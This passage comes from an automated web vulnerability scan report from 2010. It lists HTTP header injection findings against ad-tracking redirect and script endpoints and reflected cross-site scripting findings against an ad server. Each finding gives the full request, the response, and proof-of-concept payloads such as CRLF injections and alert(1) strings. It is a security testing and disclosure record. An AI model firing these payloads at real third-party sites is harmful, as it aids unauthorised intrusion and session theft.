P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.2. http://111.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://111.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 463f8%0d%0a528a1642c1b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml&463f8%0d%0a528a1642c1b=1 HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:47 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=4df582d6-538d-b488-33fe-0000429ab8cd; expires=Sat, 12-Feb-2011 23:04:47 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=cpc&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml&463f8
528a1642c1b
=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.3. http://111.xg4ken.com/media/redir.php [url[] parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://111.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is copied into the Location response header. The payload e669a%0d%0ae28ea9c05d9 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2Fe669a%0d%0ae28ea9c05d9&client=ca-dp-godaddy2_xml HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:38 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=57f27a3d-d285-68a8-5328-0000395dd34d; expires=Sat, 12-Feb-2011 23:04:38 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/e669a
e28ea9c05d9
?utm_source=google&utm_medium=cpc&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.4. http://111.xg4ken.com/media/redir.php [utm_campaign parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://111.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the utm_campaign request parameter is copied into the Location response header. The payload 30b1f%0d%0aecfcd25a03f was submitted in the utm_campaign parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=30b1f%0d%0aecfcd25a03f&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:32 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=4c8b74bb-3954-8fa8-8326-0000577eace0; expires=Sat, 12-Feb-2011 23:04:32 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=cpc&utm_term=financial mba&utm_campaign=30b1f
ecfcd25a03f
&client=ca-dp-godaddy2_xml
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.5. http://111.xg4ken.com/media/redir.php [utm_medium parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://111.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the utm_medium request parameter is copied into the Location response header. The payload 82be3%0d%0ab09c9f27eec was submitted in the utm_medium parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=82be3%0d%0ab09c9f27eec&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:18 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=3cef34ad-6303-35a8-1b8f-00003fd62bad; expires=Sat, 12-Feb-2011 23:04:18 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=82be3
b09c9f27eec
&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.6. http://111.xg4ken.com/media/redir.php [utm_source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://111.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the utm_source request parameter is copied into the Location response header. The payload a9f0f%0d%0a3b6a61bb32f was submitted in the utm_source parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=a9f0f%0d%0a3b6a61bb32f&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:11 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=6676e6cc-44e7-2308-1a57-00001c552986; expires=Sat, 12-Feb-2011 23:04:11 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=a9f0f
3b6a61bb32f
&utm_medium=cpc&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.7. http://111.xg4ken.com/media/redir.php [utm_term parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://111.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the utm_term request parameter is copied into the Location response header. The payload ca84c%0d%0aa3b87022440 was submitted in the utm_term parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=ca84c%0d%0aa3b87022440&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:26 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=45f848c0-6f73-7f49-52f3-00006d9772ca; expires=Sat, 12-Feb-2011 23:04:26 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=cpc&utm_term=ca84c
a3b87022440
&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.8. http://c7.zedo.com/ibar/v12-002/c1/jsc/fcn1.js [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /ibar/v12-002/c1/jsc/fcn1.js

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload 1fb20%0d%0a9ce365740 was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /ibar/v12-002/c1/jsc/fcn1.js?n=162&c=1fb20%0d%0a9ce365740&s=372&d=21&w=1&x=29&h=1&t=http://c7.zedo.com/OzoDB/headers/162/intercept_int268_common.js&r=24&z=0.9249365942940089 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/bay-area-living
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: c7.zedo.com
Proxy-Connection: Keep-Alive
Cookie: FFgeo=8925100; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; ZEDOIDX=29; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365

Response

HTTP/1.1 400 Bad Request
Server: ZEDO 3G
Content-Length: 147
Content-Type: text/html
Set-Cookie: ZHO162,1fb20
9ce365740
,21=1;expires=Tue, 16 Nov 2010 01: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "a1a6d5-f92-48e2846698880"
Vary: Accept-Encoding
X-Varnish: 408653166
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=4168
Date: Mon, 15 Nov 2010 01:00:06 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (400 Bad Request) has occured in response to this request.
</BODY>
</HTML>

3. Cross-site scripting (reflected)
There are 368 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://a.collective-media.net/adj/q1.mng_bang/news_fr [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.mng_bang/news_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 191d2'-alert(1)-'5261f476c6f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.mng_bang191d2'-alert(1)-'5261f476c6f/news_fr HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 421
Date: Sun, 14 Nov 2010 23:04:20 GMT
Connection: close
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 14-Dec-2010 23:04:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.mng_bang191d2'-alert(1)-'5261f476c6f/news_fr;net=q1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.2. http://a.collective-media.net/adj/q1.mng_bang/news_fr [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.mng_bang/news_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d81a3'-alert(1)-'13182692657 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.mng_bang/news_frd81a3'-alert(1)-'13182692657 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 421
Date: Sun, 14 Nov 2010 23:04:21 GMT
Connection: close
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 14-Dec-2010 23:04:21 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.mng_bang/news_frd81a3'-alert(1)-'13182692657;net=q1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.3. http://a.collective-media.net/adj/q1.mng_bang/news_fr [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.mng_bang/news_fr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0643'-alert(1)-'6bd51d1d378 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.mng_bang/news_fr;sz=728x90;click0=;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NGxvNHM5MyhnaWQkM2Y3Y2RmMmMtZjA0My0xMWRmLTk0ZDUtOTdiNjFiNzc1YTQ2LHN0JDEyODk3NzU3NDYzMDE5NDcsc2kkMjExMDUxLHYkMS4wLGFpZCRXQ09ocjBTMHFVay0sY3QkMjUseWJ4JEt6bjRYT0ZhYnlubGVUWlJwT1hBYkEsciQwKSk/1/*;ord=1289775746.342466?&f0643'-alert(1)-'6bd51d1d378=1 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/breaking-news/ci_16611270?nclick_check=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: a.collective-media.net
Proxy-Connection: Keep-Alive
Cookie: JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; cli=11c4bc59fd87e17; dc=dal; bkdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 457
Date: Sun, 14 Nov 2010 23:03:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 14-Dec-2010 23:03:13 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.mng_bang/news_fr;sz=728x90;net=q1;ord=1289775746.342466?&f0643'-alert(1)-'6bd51d1d378=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.4. http://a.collective-media.net/adj/q1.mng_bang/news_fr [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.mng_bang/news_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8f00'-alert(1)-'fd033e733cd was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.mng_bang/news_fr;sz=728x90;click0=;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NGxvNHM5MyhnaWQkM2Y3Y2RmMmMtZjA0My0xMWRmLTk0ZDUtOTdiNjFiNzc1YTQ2LHN0JDEyODk3NzU3NDYzMDE5NDcsc2kkMjExMDUxLHYkMS4wLGFpZCRXQ09ocjBTMHFVay0sY3QkMjUseWJ4JEt6bjRYT0ZhYnlubGVUWlJwT1hBYkEsciQwKSk/1/*;ord=1289775746.342466?d8f00'-alert(1)-'fd033e733cd HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/breaking-news/ci_16611270?nclick_check=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: a.collective-media.net
Proxy-Connection: Keep-Alive
Cookie: JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; cli=11c4bc59fd87e17; dc=dal; bkdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Date: Sun, 14 Nov 2010 23:03:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 14-Dec-2010 23:03:08 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.mng_bang/news_fr;sz=728x90;net=q1;ord=1289775746.342466?d8f00'-alert(1)-'fd033e733cd;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.5. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.mng_bang/news_fr

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 137a4'-alert(1)-'161cf7d1c7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj137a4'-alert(1)-'161cf7d1c7b/q1.mng_bang/news_fr;sz=728x90;net=q1;ord=1289775746.342466; HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7210
Date: Sun, 14 Nov 2010 23:04:31 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-25684700_1289775871","http://ad.doubleclick.net/adj137a4'-alert(1)-'161cf7d1c7b/q1.mng_bang/news_fr;net=q1;u=,q1-25684700_1289775871,11c4bc59fd87e17,none,cm.pb8k-cm.cm_xpd6_rtg-q1.none_h;;cmw=nurl;sz=728x90;net=q1;contx=none;dc=d;btg=cm.pb8k;btg=cm.cm_xpd6_rtg;btg=q1.none_h;ord=1
...[SNIP]...

3.6. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.mng_bang/news_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e53d'-alert(1)-'e6ce7147582 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.mng_bang9e53d'-alert(1)-'e6ce7147582/news_fr HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7156
Date: Sun, 14 Nov 2010 23:04:23 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-19828667_1289775863","http://ad.doubleclick.net//q1.mng_bang9e53d'-alert(1)-'e6ce7147582/news_fr;net=q1;u=,q1-19828667_1289775863,11c4bc59fd87e17,none,cm.pb8k-cm.cm_xpd6_rtg-q1.none_h;;contx=none;dc=d;btg=cm.pb8k;btg=cm.cm_xpd6_rtg;btg=q1.none_h?","0","0",false);</scr'+'ipt>
...[SNIP]...

3.7. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.mng_bang/news_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d80db'-alert(1)-'232fd6d5621 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.mng_bang/news_frd80db'-alert(1)-'232fd6d5621 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7156
Date: Sun, 14 Nov 2010 23:04:24 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
